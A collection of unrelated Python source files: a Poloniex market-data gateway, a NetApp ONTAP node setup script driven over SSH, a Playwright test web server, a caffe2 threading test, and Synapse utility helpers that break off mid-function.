cls.get_trade_volume_field_name() in keys:
# Date time
date_time = raw[cls.get_trades_timestamp_field_name()]
date_time = datetime.strptime(date_time, cls.get_trades_timestamp_format())
trade.date_time = date_time.strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = 1 if raw[cls.get_trade_side_field_name()] == 'buy' else 2
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt, proxy=None):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt), proxy=proxy)
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt, proxy=None):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link, proxy=proxy)
trades = []
if len(res) > 0:
for i in range(len(res)-1, -1, -1):
trade = cls.parse_trade(instmt=instmt,
raw=res[i])
trades.append(trade)
return trades
class ExchGwPoloniex(ExchangeGateway):
"""
Exchange gateway Poloniex
"""
def __init__(self, db_clients, proxy=None):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwApiPoloniex(proxy=proxy), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Poloniex'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt, proxy=self.api_socket.proxy)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
Get order book worker thread
:param instmt: Instrument name
"""
while True:
try:
ret = self.api_socket.get_trades(instmt, proxy=self.api_socket.proxy)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = threading.Thread(target=partial(self.get_order_book_worker, instmt))
t2 = threading.Thread(target=partial(self.get_trades_worker, instmt))
t1.start()
t2.start()
return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Poloniex'
instmt_name = 'BTC_NXT'
instmt_code = 'BTC_NXT'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_client = SqlClientTemplate()
exch = ExchGwPoloniex([db_client])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_recovered(False)
exch.get_order_book_worker(instmt)
#exch.get_trades_worker(instmt)
|
ssh_setup_node_multi.py
|
#!/usr/bin/python3
# Author: Adrian Bronder
# Date: October 15th, 2018
# Description: Setup preparing nodes for cluster create/join
import sys
import time
from threading import Thread
from pexpect import pxssh
import re
import json
def print_usage():
print("\nUsage: " + __file__ + " <config_file>\n")
print("<config_file> -- JSON file with setup parameters\n")
def exec_ssh(session, match_str, send_string, hostname):
found = False
if(not match_str is None):
# Load content
session.prompt()
# Get strings by row
ssh_return = session.before.decode('UTF-8').strip().split("\n")
# Print last row
print(hostname + " -> I found this string: " + ssh_return[-1])
if(re.match(match_str, ssh_return[-1])):
found = True
# Compare with input RegEx and send string if valid
if(not send_string is None):
if((match_str is None) or \
found):
if(send_string == "c") or \
(send_string == "d"):
print(hostname + " -> I am sending 'ctrl-" + send_string + "'")
session.sendcontrol(send_string)
else:
print(hostname + " -> I am sending '" + str(send_string) + "'")
session.sendline(str(send_string))
else:
print(hostname + " -> Unexpected string..." + send_string)
return found
def node_setup(node):
sp = pxssh.pxssh()
print(node["node-name"] + " -> Logging into SP")
if(not sp.login(node["sp-ip"], node["user"], node["password"], auto_prompt_reset=False)):
print(node["node-name"] + " -> SSH session failed on login.")
print(str(sp))
else:
print(node["node-name"] + " -> SSH session login successful")
# Switching to system console
if(not exec_ssh(sp, "^SP.*>", "system console", node["node-name"])):
print(node["node-name"] + " -> Unexpected prompt. Exiting NOW!")
sys.exit(1)
exec_ssh(sp, None, "", node["node-name"])
# Get to default ONTAP prompt
counter = 0
while not exec_ssh(sp, "::\**>", None, node["node-name"]) and \
(counter < 5):
last_row = sp.before.decode('UTF-8').strip().split("\n")[-1]
if(str("login:") in last_row):
exec_ssh(sp, None, node["user"], node["node-name"])
elif("assword:" in last_row):
exec_ssh(sp, None, node["password"], node["node-name"])
else:
exec_ssh(sp, None, "c", node["node-name"])
counter = counter + 1
if(counter >= 5):
print(node["node-name"] + " -> Could not set prompt. Exiting NOW!")
sys.exit(1)
# preparing console - no page breaks
exec_ssh(sp, None, "rows 0", node["node-name"])
# starting cluster setup
exec_ssh(sp, None, "cluster setup", node["node-name"])
# Acknowledging ASUP warning
if(not exec_ssh(sp, "Type yes to confirm and continue \{yes\}:", "yes", node["node-name"])):
print(node["node-name"] + " -> Unexpected return. Exiting NOW!")
sys.exit(1)
# Send node management details
if(not exec_ssh(sp, "Enter the node management interface port \[", "e0M", node["node-name"])):
print(node["node-name"] + " -> Unexpected return. Exiting NOW!")
sys.exit(1)
exec_ssh(sp, None, node["ip"], node["node-name"])
exec_ssh(sp, None, "255.255.255.0", node["node-name"])
exec_ssh(sp, None, "10.65.59.1", node["node-name"])
# Send "Enter" to continue on command line
exec_ssh(sp, None, "", node["node-name"])
exec_ssh(sp, None, "", node["node-name"])
# Exit cluster setup
if(not exec_ssh(sp, "Do you want to create a new cluster or join an existing cluster?.*", "c", node["node-name"])):
print(node["node-name"] + " -> Unexpected return. Exiting NOW!")
sys.exit(1)
# Set admin password
if(not exec_ssh(sp, "::\**>", "security login password -user " + node["user"], node["node-name"])):
print(node["node-name"] + " -> Unexpected return. Exiting NOW!")
sys.exit(1)
exec_ssh(sp, None, "", node["node-name"])
exec_ssh(sp, None, node["password"], node["node-name"])
exec_ssh(sp, None, node["password"], node["node-name"])
# Log out from ONTAP properly and return to service processor prompt
exec_ssh(sp, "::\**>", "exit", node["node-name"])
exec_ssh(sp, None, "d", node["node-name"])
print(node["node-name"] + " -> logging out...")
sp.logout()
if(len(sys.argv) != 2):
print_usage()
sys.exit(1)
with open(sys.argv[1]) as json_file:
json_data = json.load(json_file)
setup_threads = []
for cluster in json_data["clusters"]:
for node in cluster["cluster-nodes"]:
try:
t = Thread(target=node_setup, args=(node,))
t.start()
setup_threads.append(t)
except:
print("Error: unable to start thread")
for x in setup_threads:
x.join()
print("I am done")
|
server.py
|
# Copyright (c) Microsoft Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
import asyncio
import contextlib
import gzip
import mimetypes
import socket
import threading
from contextlib import closing
from http import HTTPStatus
from typing import Any, Callable, Dict, Generator, Generic, Set, Tuple, TypeVar
from urllib.parse import urlparse
from autobahn.twisted.websocket import WebSocketServerFactory, WebSocketServerProtocol
from OpenSSL import crypto
from twisted.internet import reactor, ssl
from twisted.internet.protocol import ClientFactory
from twisted.web import http
from playwright._impl._path_utils import get_file_dirname
_dirname = get_file_dirname()
def find_free_port() -> int:
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
T = TypeVar("T")
class ExpectResponse(Generic[T]):
def __init__(self) -> None:
self._value: T
@property
def value(self) -> T:
return self._value
class Server:
protocol = "http"
def __init__(self) -> None:
self.PORT = find_free_port()
self.EMPTY_PAGE = f"{self.protocol}://localhost:{self.PORT}/empty.html"
self.PREFIX = f"{self.protocol}://localhost:{self.PORT}"
self.CROSS_PROCESS_PREFIX = f"{self.protocol}://127.0.0.1:{self.PORT}"
# On Windows, this list can be empty, reporting text/plain for scripts.
mimetypes.add_type("text/html", ".html")
mimetypes.add_type("text/css", ".css")
mimetypes.add_type("application/javascript", ".js")
mimetypes.add_type("image/png", ".png")
mimetypes.add_type("font/woff2", ".woff2")
def __repr__(self) -> str:
return self.PREFIX
@abc.abstractmethod
def listen(self, factory: ClientFactory) -> None:
pass
def start(self) -> None:
request_subscribers: Dict[str, asyncio.Future] = {}
auth: Dict[str, Tuple[str, str]] = {}
csp: Dict[str, str] = {}
routes: Dict[str, Callable[[http.Request], Any]] = {}
gzip_routes: Set[str] = set()
self.request_subscribers = request_subscribers
self.auth = auth
self.csp = csp
self.routes = routes
self.gzip_routes = gzip_routes
static_path = _dirname / "assets"
class TestServerHTTPHandler(http.Request):
def process(self) -> None:
request = self
if request.content:
self.post_body = request.content.read()
request.content.seek(0, 0)
else:
self.post_body = None
uri = urlparse(request.uri.decode())
path = uri.path
if request_subscribers.get(path):
request_subscribers[path].set_result(request)
request_subscribers.pop(path)
if auth.get(path):
authorization_header = request.requestHeaders.getRawHeaders(
"authorization"
)
creds_correct = False
if authorization_header:
creds_correct = auth.get(path) == (
request.getUser().decode(),
request.getPassword().decode(),
)
if not creds_correct:
request.setHeader(
b"www-authenticate", 'Basic realm="Secure Area"'
)
request.setResponseCode(HTTPStatus.UNAUTHORIZED)
request.finish()
return
if csp.get(path):
request.setHeader(b"Content-Security-Policy", csp[path])
if routes.get(path):
routes[path](request)
return
file_content = None
try:
file_content = (static_path / path[1:]).read_bytes()
request.setHeader(b"Content-Type", mimetypes.guess_type(path)[0])
request.setHeader(b"Cache-Control", "no-cache, no-store")
if path in gzip_routes:
request.setHeader("Content-Encoding", "gzip")
request.write(gzip.compress(file_content))
else:
request.write(file_content)
self.setResponseCode(HTTPStatus.OK)
except (FileNotFoundError, IsADirectoryError, PermissionError):
request.setResponseCode(HTTPStatus.NOT_FOUND)
self.finish()
class MyHttp(http.HTTPChannel):
requestFactory = TestServerHTTPHandler
class MyHttpFactory(http.HTTPFactory):
protocol = MyHttp
self.listen(MyHttpFactory())
async def wait_for_request(self, path: str) -> http.Request:
if path in self.request_subscribers:
return await self.request_subscribers[path]
future: asyncio.Future["http.Request"] = asyncio.Future()
self.request_subscribers[path] = future
return await future
@contextlib.contextmanager
def expect_request(
self, path: str
) -> Generator[ExpectResponse[http.Request], None, None]:
future = asyncio.create_task(self.wait_for_request(path))
cb_wrapper: ExpectResponse[http.Request] = ExpectResponse()
def done_cb(task: asyncio.Task) -> None:
cb_wrapper._value = future.result()
future.add_done_callback(done_cb)
yield cb_wrapper
def set_auth(self, path: str, username: str, password: str) -> None:
self.auth[path] = (username, password)
def set_csp(self, path: str, value: str) -> None:
self.csp[path] = value
def reset(self) -> None:
self.request_subscribers.clear()
self.auth.clear()
self.csp.clear()
self.gzip_routes.clear()
self.routes.clear()
def set_route(self, path: str, callback: Callable[[http.Request], Any]) -> None:
self.routes[path] = callback
def enable_gzip(self, path: str) -> None:
self.gzip_routes.add(path)
def set_redirect(self, from_: str, to: str) -> None:
def handle_redirect(request: http.Request) -> None:
request.setResponseCode(HTTPStatus.FOUND)
request.setHeader("location", to)
request.finish()
self.set_route(from_, handle_redirect)
class HTTPServer(Server):
def listen(self, factory: ClientFactory) -> None:
reactor.listenTCP(self.PORT, factory)
class HTTPSServer(Server):
protocol = "https"
def listen(self, factory: ClientFactory) -> None:
cert = ssl.PrivateCertificate.fromCertificateAndKeyPair(
ssl.Certificate.loadPEM(
(_dirname / "testserver" / "cert.pem").read_bytes()
),
ssl.KeyPair.load(
(_dirname / "testserver" / "key.pem").read_bytes(), crypto.FILETYPE_PEM
),
)
contextFactory = cert.options()
reactor.listenSSL(self.PORT, factory, contextFactory)
class WebSocketServerServer(WebSocketServerProtocol):
def __init__(self) -> None:
super().__init__()
self.PORT = find_free_port()
def start(self) -> None:
ws = WebSocketServerFactory("ws://127.0.0.1:" + str(self.PORT))
ws.protocol = WebSocketProtocol
reactor.listenTCP(self.PORT, ws)
class WebSocketProtocol(WebSocketServerProtocol):
def onConnect(self, request: Any) -> None:
pass
def onOpen(self) -> None:
self.sendMessage(b"incoming")
def onMessage(self, payload: bytes, isBinary: bool) -> None:
if payload == b"echo-bin":
self.sendMessage(b"\x04\x02", True)
self.sendClose()
if payload == b"echo-text":
self.sendMessage(b"text", False)
self.sendClose()
if payload == b"close":
self.sendClose()
def onClose(self, wasClean: Any, code: Any, reason: Any) -> None:
pass
class TestServer:
def __init__(self) -> None:
self.server = HTTPServer()
self.https_server = HTTPSServer()
self.ws_server = WebSocketServerServer()
def start(self) -> None:
self.server.start()
self.https_server.start()
self.ws_server.start()
self.thread = threading.Thread(
target=lambda: reactor.run(installSignalHandlers=0)
)
self.thread.start()
def stop(self) -> None:
reactor.stop()
self.thread.join()
def reset(self) -> None:
self.server.reset()
self.https_server.reset()
test_server = TestServer()
|
context_test.py
|
from caffe2.python import context, test_util
from threading import Thread
@context.define_context()
class MyContext(object):
pass
class TestContext(test_util.TestCase):
def use_my_context(self):
try:
for _ in range(100):
with MyContext() as a:
for _ in range(100):
self.assertTrue(MyContext.current() == a)
except Exception as e:
self._exceptions.append(e)
def testMultiThreaded(self):
threads = []
self._exceptions = []
for _ in range(8):
thread = Thread(target=self.use_my_context)
thread.start()
threads.append(thread)
for t in threads:
t.join()
for e in self._exceptions:
raise e
@MyContext()
def testDecorator(self):
self.assertIsNotNone(MyContext.current())
|
common.py
|
import io
import os
import ssl
import sys
import json
import stat
import time
import fcntl
import heapq
import types
import base64
import shutil
import struct
import decimal
import fnmatch
import hashlib
import logging
import binascii
import builtins
import tempfile
import warnings
import functools
import itertools
import threading
import traceback
import contextlib
import collections
import yaml
import regex
import synapse.exc as s_exc
import synapse.lib.const as s_const
import synapse.lib.msgpack as s_msgpack
import synapse.lib.structlog as s_structlog
class NoValu:
pass
major = sys.version_info.major
minor = sys.version_info.minor
micro = sys.version_info.micro
majmin = (major, minor)
version = (major, minor, micro)
guidre = regex.compile('^[0-9a-f]{32}$')
buidre = regex.compile('^[0-9a-f]{64}$')
novalu = NoValu()
logger = logging.getLogger(__name__)
def now():
'''
Get the current epoch time in milliseconds.
This relies on time.time(), which is system-dependent in terms of resolution.
Examples:
Get the current time and make a row for a Cortex::
tick = now()
row = (someiden, 'foo:prop', 1, tick)
core.addRows([row])
Returns:
int: Epoch time in milliseconds.
'''
return time.time_ns() // 1000000
def guid(valu=None):
'''
Get a 16 byte guid value.
By default, this is a random guid value.
Args:
valu: Object used to construct the guid valu from. This must be able
to be msgpack'd.
Returns:
str: 32 character, lowercase ascii string.
'''
if valu is None:
return binascii.hexlify(os.urandom(16)).decode('utf8')
# Generate a "stable" guid from the given item
byts = s_msgpack.en(valu)
return hashlib.md5(byts).hexdigest()
def buid(valu=None):
'''
A binary GUID like sequence of 32 bytes.
Args:
valu (object): Optional, if provided, the hash of the msgpack
encoded form of the object is returned. This can be used to
create stable buids.
Notes:
By default, this returns a random 32 byte value.
Returns:
bytes: A 32 byte value.
'''
if valu is None:
return os.urandom(32)
byts = s_msgpack.en(valu)
return hashlib.sha256(byts).digest()
def ehex(byts):
'''
Encode a bytes variable to a string using binascii.hexlify.
Args:
byts (bytes): Bytes to encode.
Returns:
str: A string representing the bytes.
'''
return binascii.hexlify(byts).decode('utf8')
def uhex(text):
'''
Decode a hex string into bytes.
Args:
text (str): Text to decode.
Returns:
bytes: The decoded bytes.
'''
return binascii.unhexlify(text)
def isguid(text):
return guidre.match(text) is not None
def isbuidhex(text):
return buidre.match(text) is not None
def intify(x):
'''
Ensure ( or coerce ) a value into being an integer or None.
Args:
x (obj): An object to intify
Returns:
(int): The int value ( or None )
'''
if isinstance(x, int):
return x
try:
return int(x, 0)
except (TypeError, ValueError):
return None
hugectx = decimal.Context(prec=15)
def hugenum(valu):
'''
Return a decimal.Decimal with proper precision for use as a synapse hugenum.
'''
return decimal.Decimal(valu, context=hugectx)
def vertup(vstr):
'''
Convert a version string to a tuple.
Example:
ver = vertup('1.3.30')
'''
return tuple([int(x) for x in vstr.split('.')])
def todo(_todoname, *args, **kwargs):
'''
Construct and return a todo tuple of (name, args, kwargs).
Note: the odd name for the first parameter is to avoid collision with keys in kwargs.
'''
return (_todoname, args, kwargs)
def tuplify(obj):
'''
Convert a nested set of python primitives into tupleized forms via msgpack.
'''
return s_msgpack.un(s_msgpack.en(obj))
def genpath(*paths):
'''
Return an absolute path of the joining of the arguments as path elements
Performs home directory(``~``) and environment variable expansion on the joined path
Args:
*paths ([str,...]): A list of path elements
Note:
All paths used by Synapse operations (i.e. everything but the data) shall use this function or one of its
callers before storing as object properties.
'''
path = os.path.join(*paths)
path = os.path.expanduser(path)
path = os.path.expandvars(path)
return os.path.abspath(path)
def switchext(*paths, ext):
'''
Return an absolute path of the joining of the arguments with the extension replaced.
If an extension does not exist, it will be added.
Args:
*paths ([str,...]): A list of path elements
ext (str): A file extension (e.g. '.txt'). It should begin with a period.
'''
return os.path.splitext(genpath(*paths))[0] + ext
def reqpath(*paths):
'''
Return the absolute path of the joining of the arguments, raising an exception if a file doesn't exist at resulting
path
Args:
*paths ([str,...]): A list of path elements
'''
path = genpath(*paths)
if not os.path.isfile(path):
raise s_exc.NoSuchFile(mesg=f'No such path {path}', path=path)
return path
def reqfile(*paths, **opts):
'''
Return a file at the path resulting from joining of the arguments, raising an exception if the file does not
exist.
Args:
*paths ([str,...]): A list of path elements
**opts: arguments as kwargs to io.open
Returns:
io.BufferedRandom: A file-object which can be read/written too.
'''
path = genpath(*paths)
if not os.path.isfile(path):
raise s_exc.NoSuchFile(mesg=f'No such file {path}', path=path)
opts.setdefault('mode', 'rb')
return io.open(path, **opts)
def getfile(*paths, **opts):
'''
Return a file at the path resulting from joining of the arguments, or None if the file does not exist.
Args:
*paths ([str,...]): A list of path elements
**opts: arguments as kwargs to io.open
Returns:
io.BufferedRandom: A file-object which can be read/written too.
'''
path = genpath(*paths)
if not os.path.isfile(path):
return None
opts.setdefault('mode', 'rb')
return io.open(path, **opts)
def getbytes(*paths, **opts):
fd = getfile(*paths, **opts)
if fd is None:
return None
with fd:
return fd.read()
def reqbytes(*paths):
with reqfile(*paths) as fd:
return fd.read()
def genfile(*paths):
'''
Create or open (for read/write) a file path join.
Args:
*paths: A list of paths to join together to make the file.
Notes:
If the file already exists, the fd returned is opened in ``r+b`` mode.
Otherwise, the fd is opened in ``w+b`` mode.
The file position is set to the start of the file. The user is
responsible for truncating (``fd.truncate()``) if the existing file
contents are not desired, or seeking to the end (``fd.seek(0, 2)``)
to append.
Returns:
io.BufferedRandom: A file-object which can be read/written too.
'''
path = genpath(*paths)
gendir(os.path.dirname(path))
if not os.path.isfile(path):
return io.open(path, 'w+b')
return io.open(path, 'r+b')
@contextlib.contextmanager
def getTempDir():
tempdir = tempfile.mkdtemp()
try:
yield tempdir
finally:
shutil.rmtree(tempdir, ignore_errors=True)
@contextlib.contextmanager
def lockfile(path):
'''
A file lock with-block helper.
Args:
path (str): A path to a lock file.
Examples:
Get the lock on a file and dostuff while having the lock::
path = '/hehe/haha.lock'
with lockfile(path):
dostuff()
Notes:
This is curently based on fcntl.lockf(), and as such, it is purely
advisory locking. If multiple processes are attempting to obtain a
lock on the same file, this will block until the process which has
the current lock releases it.
Yields:
None
'''
with genfile(path) as fd:
fcntl.lockf(fd, fcntl.LOCK_EX)
yield None
def listdir(*paths, glob=None):
'''
List the (optionally glob filtered) full paths from a dir.
Args:
*paths ([str,...]): A list of path elements
glob (str): An optional fnmatch glob str
'''
path = genpath(*paths)
names = os.listdir(path)
if glob is not None:
names = fnmatch.filter(names, glob)
retn = [os.path.join(path, name) for name in names]
return retn
def gendir(*paths, **opts):
'''
Return the absolute path of the joining of the arguments, creating a directory at the resulting path if one does
not exist.
Performs home directory(~) and environment variable expansion.
Args:
*paths ([str,...]): A list of path elements
**opts: arguments as kwargs to os.makedirs
'''
mode = opts.get('mode', 0o700)
path = genpath(*paths)
if os.path.islink(path):
path = os.readlink(path)
if not os.path.isdir(path):
os.makedirs(path, mode=mode, exist_ok=True)
return path
def reqdir(*paths):
'''
Return the absolute path of the joining of the arguments, raising an exception if a directory does not exist at
the resulting path.
Performs home directory(~) and environment variable expansion.
Args:
*paths ([str,...]): A list of path elements
'''
path = genpath(*paths)
if not os.path.isdir(path):
raise s_exc.NoSuchDir(path=path)
return path
def getDirSize(*paths):
'''
Returns:
Tuple of total real and total apparent size of all normal files and directories underneath *paths plus *paths
itself
Equivalent to `du -B 1 -s` and `du -bs`
Args:
*paths ([str,...]): A list of path elements
'''
def getsize(path):
try:
status = os.lstat(path)
except OSError: # pragma: no cover
return 0, 0
mode = status.st_mode
if not (stat.S_ISREG(mode) or stat.S_ISDIR(mode)):
return 0, 0
return status.st_blocks * 512, status.st_size
realsum, apprsum = getsize(genpath(*paths))
for fpath, dirnames, fnames in os.walk(reqdir(*paths)):
for fname in itertools.chain(fnames, dirnames):
fp = genpath(fpath, fname)
real, appr = getsize(fp)
realsum += real
apprsum += appr
return realsum, apprsum
def jsload(*paths):
with genfile(*paths) as fd:
byts = fd.read()
if not byts:
return None
return json.loads(byts.decode('utf8'))
def jslines(*paths):
with genfile(*paths) as fd:
for line in fd:
yield json.loads(line)
def jssave(js, *paths):
path = genpath(*paths)
with io.open(path, 'wb') as fd:
fd.write(json.dumps(js, sort_keys=True, indent=2).encode('utf8'))
def yamlload(*paths):
path = genpath(*paths)
if not os.path.isfile(path):
return None
with io.open(path, 'rb') as fd:
byts = fd.read()
if not byts:
return None
return yaml.safe_load(byts.decode('utf8'))
def yamlsave(obj, *paths):
path = genpath(*paths)
with genfile(path) as fd:
s = yaml.safe_dump(obj, allow_unicode=False, default_flow_style=False,
default_style='', explicit_start=True, explicit_end=True, sort_keys=True)
fd.truncate(0)
fd.write(s.encode('utf8'))
def yamlmod(obj, *paths):
'''
Combines/creates a yaml file and combines with obj. obj and file must be maps/dict or empty.
'''
oldobj = yamlload(*paths)
if obj is not None:
if oldobj:
yamlsave({**oldobj, **obj}, *paths)
else:
yamlsave(obj, *paths)
def verstr(vtup):
'''
Convert a version tuple to a string.
'''
return '.'.join([str(v) for v in vtup])
def excinfo(e):
'''
Populate err,errmsg,errtrace info from exc.
'''
tb = e.__traceback__
path, line, name, sorc = traceback.extract_tb(tb)[-1]
ret = {
'err': e.__class__.__name__,
'errmsg': str(e),
'errfile': path,
'errline': line,
}
if isinstance(e, s_exc.SynErr):
ret['errinfo'] = e.errinfo
return ret
def errinfo(name, mesg):
return {
'err': name,
'errmsg': mesg,
}
def chunks(item, size):
'''
Divide an iterable into chunks.
Args:
item: Item to slice
size (int): Maximum chunk size.
Notes:
This supports Generator objects and objects which support calling
the __getitem__() method with a slice object.
Yields:
Slices of the item containing up to "size" number of items.
'''
# use islice if it's a generator
if isinstance(item, types.GeneratorType):
while True:
chunk = tuple(itertools.islice(item, size))
if not chunk:
return
yield chunk
# The sequence item is empty, yield a empty slice from it.
# This will also catch mapping objects since a slice should
# be an unhashable type for a mapping and the __getitem__
# method would not be present on a set object
if not item:
yield item[0:0]
return
# otherwise, use normal slicing
off = 0
while True:
chunk = item[off:off + size]
if not chunk:
return
yield chunk
off += size
def iterfd(fd, size=10000000):
'''
Generator which yields bytes from a file descriptor.
Args:
fd (file): A file-like object to read bytes from.
size (int): Size, in bytes, of the number of bytes to read from the
fd at a given time.
Notes:
If the first read call on the file descriptor is a empty bytestring,
that zero length bytestring will be yielded and the generator will
then be exhuasted. This behavior is intended to allow the yielding of
contents of a zero byte file.
Yields:
bytes: Bytes from the file descriptor.
'''
fd.seek(0)
byts = fd.read(size)
# Fast path to yield b''
if len(byts) == 0:
yield byts
return
while byts:
yield byts
byts = fd.read(size)
def spin(genr):
'''
Crank through a generator but discard the yielded values.
Args:
genr: Any generator or iterable valu.
Notes:
This generator is exhausted via the ``collections.dequeue()``
constructor with a ``maxlen=0``, which will quickly exhaust an
iterator staying in C code as much as possible.
Returns:
None
'''
collections.deque(genr, 0)
async def aspin(genr):
'''
Async version of spin
'''
async for _ in genr:
pass
async def agen(*items):
for item in items:
yield item
def firethread(f):
'''
A decorator for making a function fire a thread.
'''
@functools.wraps(f)
def callmeth(*args, **kwargs):
thr = worker(f, *args, **kwargs)
return thr
return callmeth
def worker(meth, *args, **kwargs):
thr = threading.Thread(target=meth, args=args, kwargs=kwargs)
thr.setDaemon(True)
thr.start()
return thr
sockerrs = (builtins.ConnectionError, builtins.FileNotFoundError)
_Int64be = struct.Struct('>Q')
def int64en(i):
'''
Encode an unsigned 64-bit int into 8 byte big-endian bytes
'''
return _Int64be.pack(i)
def int64un(b):
'''
Decode an unsigned 64-bit int from 8 byte big-endian
'''
return _Int64be.unpack(b)[0]
_SignedInt64be = struct.Struct('>q')
def signedint64en(i):
'''
Encode a signed 64-bit int into 8 byte big-endian bytes
'''
return _SignedInt64be.pack(i)
def signedint64un(b):
'''
Decode a signed 64-bit int from 8 byte big-endian
'''
return _SignedInt64be.unpack(b)[0]
def enbase64(b):
return base64.b64encode(b).decode('utf8')
def debase64(b):
return base64.b64decode(b.encode('utf8'))
def makedirs(path, mode=0o777):
os.makedirs(path, mode=mode, exist_ok=True)
def iterzip(*args, fillvalue=None):
return itertools.zip_longest(*args, fillvalue=fillvalue)
def _getLogConfFromEnv(defval=None, structlog=None):
if structlog:
structlog = 'true'
else:
structlog = 'false'
defval = os.getenv('SYN_LOG_LEVEL', defval)
structlog = envbool('SYN_LOG_STRUCT', structlog)
ret = {'defval': defval, 'structlog': structlog}
return ret
def normLogLevel(valu):
'''
Norm a log level value to a integer.
Args:
valu: The value to norm ( a string or integer ).
Returns:
int: A valid Logging log level.
'''
if isinstance(valu, int):
if valu not in s_const.LOG_LEVEL_INVERSE_CHOICES:
raise s_exc.BadArg(mesg=f'Invalid log level provided: {valu}', valu=valu)
return valu
if isinstance(valu, str):
valu = valu.strip()
try:
valu = int(valu)
except ValueError:
valu = valu.upper()
ret = s_const.LOG_LEVEL_CHOICES.get(valu)
if ret is None:
raise s_exc.BadArg(mesg=f'Invalid log level provided: {valu}', valu=valu) from None
return ret
else:
return normLogLevel(valu)
raise s_exc.BadArg(mesg=f'Unknown log level type: {type(valu)} {valu}', valu=valu)
def setlogging(mlogger, defval=None, structlog=None):
'''
Configure synapse logging.
Args:
mlogger (logging.Logger): Reference to a logging.Logger()
defval (str): Default log level. May be an integer.
Notes:
This calls logging.basicConfig and should only be called once per process.
Returns:
None
'''
ret = _getLogConfFromEnv(defval, structlog)
log_level = ret.get('defval')
log_struct = ret.get('structlog')
if log_level: # pragma: no cover
log_level = normLogLevel(log_level)
if log_struct:
handler = logging.StreamHandler()
formatter = s_structlog.JsonFormatter()
handler.setFormatter(formatter)
logging.basicConfig(level=log_level, handlers=(handler,))
else:
logging.basicConfig(level=log_level, format=s_const.LOG_FORMAT)
mlogger.info('log level set to %s', s_const.LOG_LEVEL_INVERSE_CHOICES.get(log_level))
return ret
syndir = os.getenv('SYN_DIR')
if syndir is None:
syndir = '~/.syn'
def envbool(name, defval='false'):
'''
Resolve an environment variable to a boolean value.
Args:
name (str): Environment variable to resolve.
defval (str): Default string value to resolve as.
Notes:
False values will be consider strings "0" or "false" after lower casing.
Returns:
boolean: True if the envar is set, false if it is set to a false value.
'''
return os.getenv(name, defval).lower() not in ('0', 'false')
def getSynPath(*paths):
return genpath(syndir, *paths)
def getSynDir(*paths):
return gendir(syndir, *paths)
def result(retn):
'''
Return a value or raise an exception from a retn tuple.
'''
ok, valu = retn
if ok:
return valu
name, info = valu
ctor = getattr(s_exc, name, None)
if ctor is not None:
raise ctor(**info)
info['errx'] = name
raise s_exc.SynErr(**info)
def err(e, fulltb=False):
name = e.__class__.__name__
info = {}
tb = sys.exc_info()[2]
tbinfo = traceback.extract_tb(tb)
if tbinfo:
path, line, tbname, src = tbinfo[-1]
path = os.path.basename(path)
info = {
'efile': path,
'eline': line,
'esrc': src,
'ename': tbname,
}
if isinstance(e, s_exc.SynErr):
info.update(e.items())
else:
info['mesg'] = str(e)
if fulltb:
s = traceback.format_exc()
if s[-1:] == "\n":
s = s[:-1]
info['etb'] = s
return (name, info)
def retnexc(e):
'''
Construct a retn tuple for the given exception.
'''
return (False, err(e))
def config(conf, confdefs):
'''
Initialize a config dict using the given confdef tuples.
'''
